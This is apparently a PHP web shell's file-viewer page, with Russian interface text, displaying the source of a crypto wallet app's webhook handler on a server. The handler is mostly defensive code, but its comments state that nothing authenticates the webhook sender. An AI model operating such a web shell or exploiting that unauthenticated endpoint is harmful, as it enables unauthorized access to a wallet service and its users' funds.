PHP WebShell

Текущая директория: /var/www/bitcardoApp/cron

Просмотр файла: webhook_confirm.php

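<?php
/**
 * Webhook receiver for transaction-confirmation events.
 *
 * Flow: parse the JSON body, validate the transaction hash and coin, ask the
 * local BitGo endpoint for the authoritative transaction state, update the
 * `transactions` row, then record the call in `webhook_logs`.
 *
 * Security notes:
 *  - Secrets are read from the environment instead of being literals in this
 *    file, so disclosure of the source (backup, repository, file viewer) does
 *    not disclose them. The variable names BITCARDO_DB_PASSWORD and
 *    BITGO_ACCESS_TOKEN are chosen here and must be provided by the
 *    deployment. Any secret that was ever stored as a literal in this file
 *    should be treated as exposed and rotated.
 *  - NOTE(review): nothing in this script authenticates the sender. Any
 *    client that can reach the URL can trigger an authenticated outbound
 *    request and a log insert. Add sender verification (shared secret,
 *    signature check or network allowlist) appropriate to the deployment.
 */
header("Content-Type: application/json");

// Emit a JSON body with the given HTTP status and stop the script.
$respond = static function ($httpStatus, array $body) {
    http_response_code($httpStatus);
    echo json_encode($body);
    exit;
};

// True when $value is a string that is safe to place in a URL path segment.
// The allowlist is deliberately conservative: it must start with an
// alphanumeric character (which rules out "." and ".." segments) and cannot
// contain "/", "?", "#", "%", whitespace or control characters. Widen it only
// for identifier formats this deployment actually receives.
$isSafeSegment = static function ($value, $maxLength) {
    return is_string($value)
        && strlen($value) <= $maxLength
        && preg_match('/\A[A-Za-z0-9][A-Za-z0-9._:@-]*\z/', $value) === 1;
};

$rawPayload = file_get_contents("php://input");
if ($rawPayload === false) {
    $rawPayload = '';
}
$data = json_decode($rawPayload, true);
if (!is_array($data)) {
    // Covers malformed JSON and JSON scalars such as "abc" or 42.
    $data = [];
}

$txid = $data['hash'] ?? null;
$coin = $data['coin'] ?? null;
// Only strings are bound into the log row; arrays/objects from the payload
// would otherwise be bound as the text "Array".
$walletId = is_string($data['wallet'] ?? null) ? $data['wallet'] : null;
$eventType = is_string($data['type'] ?? null) ? $data['type'] : null;

// Both values are interpolated into the request path below and sent with the
// bearer token, so they are validated before any further work is done.
if (!$isSafeSegment($txid, 128) || !$isSafeSegment($coin, 32)) {
    $respond(400, ['error' => 'Invalid payload']);
}

$dbPassword = getenv('BITCARDO_DB_PASSWORD');
$bitgoToken = getenv('BITGO_ACCESS_TOKEN');
if (!is_string($dbPassword) || $dbPassword === '' || !is_string($bitgoToken) || $bitgoToken === '') {
    // Fail closed rather than run with missing credentials.
    $respond(500, ['error' => 'Server misconfigured']);
}

// Make mysqli throw on failure so a failed connect/prepare/execute is handled
// here instead of surfacing as a fatal error (whose trace can include the
// connection arguments when error display is enabled).
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
try {
    $conn = new mysqli('localhost', 'bitcardo_wallet', $dbPassword, 'bitcardo_wallet');
} catch (mysqli_sql_exception $e) {
    $respond(500, ['error' => 'DB connection failed']);
}

define('BITGO_API_BASE_URL', 'http://127.0.0.1:3080/api/v2');
define('BITGO_ACCESS_TOKEN', $bitgoToken);

// $coin and $txid passed the allowlist above, so they cannot add path
// segments, a query string or a fragment to this URL.
$url = BITGO_API_BASE_URL . "/$coin/tx/$txid";
$ch = curl_init($url);
curl_setopt_array($ch, [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_HTTPHEADER => ["Authorization: Bearer " . BITGO_ACCESS_TOKEN],
    // Bound the time a single webhook call can hold a worker.
    CURLOPT_CONNECTTIMEOUT => 5,
    CURLOPT_TIMEOUT => 15,
]);
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($response === false) {
    // Transport failure: log an empty response body instead of a boolean.
    $response = '';
}

// Default values if fetch fails
$confirmations = 0;
$status = 'unknown';

try {
    if ($httpCode === 200) {
        $txDetails = json_decode($response, true);
        if (!is_array($txDetails)) {
            $txDetails = [];
        }
        // The stored state comes from the API response, not from the webhook
        // body; coerce types so bind_param never receives an array.
        $confirmations = (int) ($txDetails['confirmations'] ?? 0);
        $status = is_string($txDetails['state'] ?? null) ? $txDetails['state'] : 'pending';

        $stmt = $conn->prepare("UPDATE transactions SET confirmation = ?, status = ?, updated_at = NOW() WHERE txid = ? AND coin = ?");
        $stmt->bind_param("isss", $confirmations, $status, $txid, $coin);
        $stmt->execute();
        $stmt->close();
    }

    // Log webhook (written whether or not the lookup succeeded).
    $stmtLog = $conn->prepare("
    INSERT INTO webhook_logs (event_type, coin, wallet_id, txid, status_code, response, raw_payload)
    VALUES (?, ?, ?, ?, ?, ?, ?)
");
    $stmtLog->bind_param("ssssiss", $eventType, $coin, $walletId, $txid, $httpCode, $response, $rawPayload);
    $stmtLog->execute();
    $stmtLog->close();
} catch (mysqli_sql_exception $e) {
    // Do not echo the driver message: it can reveal schema details.
    $conn->close();
    $respond(500, ['error' => 'DB write failed']);
}

$conn->close();

http_response_code(200);
echo json_encode(['success' => true]);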



Для локальной разработки. Не используйте в интернете!